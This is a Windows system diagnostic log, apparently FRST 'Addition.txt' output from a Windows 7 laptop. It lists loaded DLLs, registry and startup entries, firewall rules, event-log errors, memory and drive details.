2017-04-15 21:58 - 2017-04-14 01:33 - 00224064 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00207680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00053072 _____ () C:\Program Files (x86)\Dropbox\Client\winrpcserver.compiled._RPCServer.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00022864 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32.compiled._winffi_user32.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00022872 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi.compiled._winffi_iphlpapi.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00021848 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror.compiled._winffi_winerror.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00022872 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet.compiled._winffi_wininet.pyd
2017-04-15 21:58 - 2017-03-20 20:13 - 00349128 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00023896 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00025936 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2017-04-15 21:58 - 2017-03-20 20:08 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2017-04-15 21:58 - 2017-04-14 01:33 - 00084288 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2017-04-15 21:58 - 2017-04-14 01:34 - 00030536 _____ () C:\Program Files (x86)\Dropbox\Client\wind3d11.compiled._wind3d11.pyd
2017-04-15 21:58 - 2017-03-20 20:17 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2017-04-15 21:58 - 2017-03-20 20:17 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2017-04-15 21:58 - 2017-04-14 01:33 - 00357688 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2017-04-15 21:58 - 2017-04-14 01:34 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2017-04-15 21:58 - 2017-04-14 01:33 - 00546104 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2016-08-22 18:11 - 2016-08-22 18:11 - 00428032 _____ () C:\Program Files (x86)\PLAY ONLINE\core.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00261632 _____ () C:\Program Files (x86)\PLAY ONLINE\sdk.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00011362 _____ () C:\Program Files (x86)\PLAY ONLINE\mingwm10.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00043008 _____ () C:\Program Files (x86)\PLAY ONLINE\libgcc_s_dw2-1.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 02415104 _____ () C:\Program Files (x86)\PLAY ONLINE\QtCore4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 09515520 _____ () C:\Program Files (x86)\PLAY ONLINE\QtGui4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00381952 _____ () C:\Program Files (x86)\PLAY ONLINE\Proxy.DLL
2016-08-22 18:11 - 2016-08-22 18:11 - 00218112 _____ () C:\Program Files (x86)\PLAY ONLINE\Common.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00135168 _____ () C:\Program Files (x86)\PLAY ONLINE\Trace.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00545280 _____ () C:\Program Files (x86)\PLAY ONLINE\PluginContainer.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00238080 _____ () C:\Program Files (x86)\PLAY ONLINE\AtCodec.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00301056 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00235008 _____ () C:\Program Files (x86)\PLAY ONLINE\NetSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00133120 _____ () C:\Program Files (x86)\PLAY ONLINE\OSDialup.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00159232 _____ () C:\Program Files (x86)\PLAY ONLINE\XCodec.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00157184 _____ () C:\Program Files (x86)\PLAY ONLINE\DataServicePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00176128 _____ () C:\Program Files (x86)\PLAY ONLINE\CallSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00264704 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00217600 _____ () C:\Program Files (x86)\PLAY ONLINE\SmsSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00142336 _____ () C:\Program Files (x86)\PLAY ONLINE\USSDSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00156672 _____ () C:\Program Files (x86)\PLAY ONLINE\STKSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00338432 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00065536 _____ () C:\Program Files (x86)\PLAY ONLINE\OSPowerMgr.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00106496 _____ () C:\Program Files (x86)\PLAY ONLINE\Win7Support.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01077248 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00670720 _____ () C:\Program Files (x86)\PLAY ONLINE\SmsAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00550400 _____ () C:\Program Files (x86)\PLAY ONLINE\CallAppPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00547840 _____ () C:\Program Files (x86)\PLAY ONLINE\CallLogSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00158720 _____ () C:\Program Files (x86)\PLAY ONLINE\NetConnectSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00211968 _____ () C:\Program Files (x86)\PLAY ONLINE\DialUpPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00101376 _____ () C:\Program Files (x86)\PLAY ONLINE\OSAdapt.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00180224 _____ () C:\Program Files (x86)\PLAY ONLINE\NDISPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00131072 _____ () C:\Program Files (x86)\PLAY ONLINE\OSNDIS.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01101824 _____ () C:\Program Files (x86)\PLAY ONLINE\NDISAPI.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00278528 _____ () C:\Program Files (x86)\PLAY ONLINE\NetInfoSrvPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00062976 _____ () C:\Program Files (x86)\PLAY ONLINE\OSCall.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00495104 _____ () C:\Program Files (x86)\PLAY ONLINE\DeviceMgrUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00123392 _____ () C:\Program Files (x86)\PLAY ONLINE\ATR2SMgr.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00190464 _____ () C:\Program Files (x86)\PLAY ONLINE\XFramePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00310272 _____ () C:\Program Files (x86)\PLAY ONLINE\StatusBarMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00118272 _____ () C:\Program Files (x86)\PLAY ONLINE\LayoutPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00427008 _____ () C:\Program Files (x86)\PLAY ONLINE\DialupUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00334848 _____ () C:\Program Files (x86)\PLAY ONLINE\MainpagePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01148416 _____ () C:\Program Files (x86)\PLAY ONLINE\QtNetwork4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00093184 _____ () C:\Program Files (x86)\PLAY ONLINE\NotifyServicePlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00333312 _____ () C:\Program Files (x86)\PLAY ONLINE\NetConnectPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00249344 _____ () C:\Program Files (x86)\PLAY ONLINE\MenuMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00384512 _____ () C:\Program Files (x86)\PLAY ONLINE\USSDUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00483328 _____ () C:\Program Files (x86)\PLAY ONLINE\NetInfoUIExPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00808960 _____ () C:\Program Files (x86)\PLAY ONLINE\SMSUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00739328 _____ () C:\Program Files (x86)\PLAY ONLINE\AddrBookUIPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00269824 _____ () C:\Program Files (x86)\PLAY ONLINE\LiveUpdateInterface.DLL
2016-08-22 18:11 - 2016-08-22 18:11 - 00240128 _____ () C:\Program Files (x86)\PLAY ONLINE\ToolBarMgrPlugin.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00082944 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qgif4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00081920 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qico4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00192000 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qjpeg4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00350720 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qmng4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00370176 _____ () C:\Program Files (x86)\PLAY ONLINE\plugins\imageformats\qtiff4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00011362 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\mingwm10.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00043008 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\libgcc_s_dw2-1.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 02415104 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtCore4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 01148416 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtNetwork4.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00384512 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QueryStrategy.dll
2016-08-22 18:11 - 2016-08-22 18:11 - 00398336 _____ () C:\ProgramData\PLAY ONLINE\OnlineUpdate\QtXml4.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\Software\Classes\.scr: DWGTrueViewScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2016-08-26 09:34 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tomash\AppData\Roaming\IrfanView\IrfanView_Wallpaper.bmp
DNS Servers: 194.204.152.34 - 194.204.159.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^SRS Premium Sound.lnk => C:\Windows\pss\SRS Premium Sound.lnk.CommonStartup
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: Dropbox => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: Samsung PanelMgr => C:\Windows\Samsung\PanelMgr\ssmmgr.exe /autorun
MSCONFIG\startupreg: Spotify => "C:\Users\Tomash\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Tomash\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteamServerBrowser => C:\Gry\Counter-Strike 1.6 v43\SteamServerBrowser\SteamServerBrowser.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{952DB246-B97D-413F-BC12-879357E636A2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BDBDCC65-EB1B-40A4-A733-7A911170804A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{865093ED-8826-47CB-BCF3-769EFDBEBC17}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{8364D3FE-F517-4590-8737-2A3EEBFEE386}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [TCP Query User{573F4283-936B-4191-8DBE-0CD1079C701D}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{B2BC0F29-CA68-4326-9E69-925516454048}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{D3F405E1-691E-4FB1-B9E4-6FCE5C51B56C}C:\users\tomash\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tomash\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B22E0B2-AEBF-41AD-AD2C-66FE4F6FE883}C:\users\tomash\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\tomash\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DB22C5B3-2500-41F8-9C23-EE97473B4427}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{7AFAB6DA-28CD-4075-8DC7-3B6118A41CED}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe
FirewallRules: [{87AE4541-3404-4DAA-AC08-4BE5352A8BB5}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{7028F1C1-7A88-41C8-BBC3-CE3648684E36}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe
FirewallRules: [{61AE48B0-E9A8-4988-B234-CEDCD1F7634D}] => (Allow) C:\Program Files\Canon\DIAS\CnxDIAS.exe
FirewallRules: [TCP Query User{CF52DE92-1267-4C84-815E-E42984D2B684}C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [UDP Query User{4114F933-16CD-445E-81B1-77642D7B2E2F}C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_101\bin\javaw.exe
FirewallRules: [{BD9FFC32-B1C0-4C67-A306-9B29ABC9EDCB}] => (Allow) C:\Program Files (x86)\NapiProjekt\napisy.exe
FirewallRules: [{306F648F-943A-4217-89E8-D8C9835C8EB2}] => (Allow) C:\Program Files (x86)\NapiProjekt\napisy.exe
FirewallRules: [TCP Query User{316EB19A-68FC-4A7C-B30F-4C1398974C64}C:\gry\counter-strike 1.6 v43\hl.exe] => (Block) C:\gry\counter-strike 1.6 v43\hl.exe
FirewallRules: [UDP Query User{AABF5248-E548-4B36-B448-62BE90B2CF95}C:\gry\counter-strike 1.6 v43\hl.exe] => (Block) C:\gry\counter-strike 1.6 v43\hl.exe
FirewallRules: [{F333B0AB-54DF-4C33-9AFB-446CB8BE7D15}] => (Allow) C:\Users\Tomash\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{CBC628C3-8A42-45A8-8C3A-3D274C51506B}] => (Allow) C:\Users\Tomash\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5703A76A-658C-455E-9547-267E52D65D8F}] => (Allow) C:\Program Files (x86)\MyPublicWiFi\MyPublicWiFi.exe
FirewallRules: [{B48F2B2C-0519-4BAA-86F2-C4F06EC4D01C}] => (Allow) C:\Program Files (x86)\MyPublicWiFi\MyPublicWiFi.exe
FirewallRules: [TCP Query User{6CDBFD09-2B3B-4E19-88E7-73F73CDB332D}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [UDP Query User{FC3BC232-9A09-475C-A637-349B94926CD5}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [TCP Query User{F595C148-3B37-4846-BC4C-EA034E361DAE}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{50451050-73EA-4C40-BD2E-8A71DCD99D19}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [TCP Query User{E7C5CEF3-2367-4E23-A0D3-7703B78D5A41}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [UDP Query User{EEAE9929-F5FB-4554-91BA-5DAA00C1F254}C:\program files (x86)\brackets\node.exe] => (Allow) C:\program files (x86)\brackets\node.exe
FirewallRules: [{44FF3773-F775-4A2B-8CB6-4AD28527CD83}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{9E8F7C1E-3B70-4331-9CC6-192653559BCC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [{E5386C8D-592D-4E4A-AD91-64007AE4AC51}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe

==================== Restore Points =========================

12-04-2017 08:39:39 Scheduled Checkpoint
18-04-2017 15:28:22 Installed HexEdit

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/19/2017 08:10:34 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 10:22:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 04:41:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HexEdit.exe, version: 4.0.0.60, time stamp: 0x4ff7cad3
Faulting module name: ntdll.dll, version: 6.1.7601.17514, time stamp: 0x4ce7ba58
Exception code: 0xc015000f
Fault offset: 0x000845c1
Faulting process id: 0x4a4
Faulting application start time: 0x01d2b851ce63bb70
Faulting application path: C:\Program Files (x86)\HexEdit\HexEdit.exe
Faulting module path: C:\Windows\SysWOW64\ntdll.dll
Report Id: 0ed1e6f0-2445-11e7-862c-20cf30372acf

Error: (04/18/2017 04:21:31 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/18/2017 08:01:25 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/17/2017 08:54:58 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/16/2017 03:47:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/16/2017 01:44:49 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/15/2017 09:53:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (04/14/2017 08:10:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (04/19/2017 08:40:43 AM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.

Error: (04/19/2017 08:40:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PLAY ONLINE. OUC service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.

Error: (04/19/2017 08:40:20 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the PLAY ONLINE. OUC service to connect.

Error: (04/19/2017 08:11:24 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly.  It has done this 1 time(s).

Error: (04/19/2017 08:11:08 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (04/19/2017 08:10:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
VBoxNetAdp

Error: (04/18/2017 10:38:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PLAY ONLINE. OUC service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.

Error: (04/18/2017 10:38:18 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the PLAY ONLINE. OUC service to connect.

Error: (04/18/2017 10:23:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID 
{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}
 and APPID 
{344ED43D-D086-4961-86A6-1106F4ACAD9B}
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.

Error: (04/18/2017 10:23:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly.  It has done this 1 time(s).


==================== Memory info =========================== 

Processor: Pentium(R) Dual-Core CPU T4500 @ 2.30GHz
Percentage of memory in use: 71%
Total physical RAM: 3071.27 MB
Available physical RAM: 864.02 MB
Total Virtual: 6140.74 MB
Available Virtual: 2952.51 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:94.06 GB) (Free:18.71 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (Data) (Fixed) (Total:204.03 GB) (Free:32.21 GB) NTFS
Drive g: (PLAY ONLINE) (CDROM) (Total:0.03 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E0C5913D)
Partition 1: (Active) - (Size=94.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=204 GB) - (Type=OF Extended)

==================== End of Addition.txt ============================